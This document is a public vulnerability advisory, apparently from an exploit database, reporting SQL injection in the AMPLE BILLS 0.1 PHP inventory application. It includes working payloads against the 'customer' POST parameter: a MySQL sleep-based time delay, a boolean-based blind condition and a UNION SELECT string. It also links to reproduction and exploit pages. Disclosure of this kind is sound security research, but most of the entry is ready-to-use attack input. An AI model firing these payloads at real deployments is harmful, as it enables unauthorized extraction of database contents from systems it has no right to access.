## Title: AMPLE BILLS 0.1 Multiple-SQLi
## Author: nu11secur1ty
## Date: 04/13/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection## Description:
The customer parameter (#1*) appears to be vulnerable to SQL injection
attacks. The payload (select*from(select(sleep(20)))a) was submitted
in the customer parameter. The application took 20017 milliseconds to
respond to the request, compared with 4 milliseconds for the original
request, indicating that the injected SQL command caused a time delay.
The database appears to be MySQL. The attacker can get all information
from the system by using this vulnerability!
STATUS: HIGH- Vulnerability
[+]Payload:
```mysql
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: customer=(-2876) OR
5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: customer=(-8147) UNION ALL SELECT
CONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024
- 04/13/2024
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html)
## Time spent:
01:15:00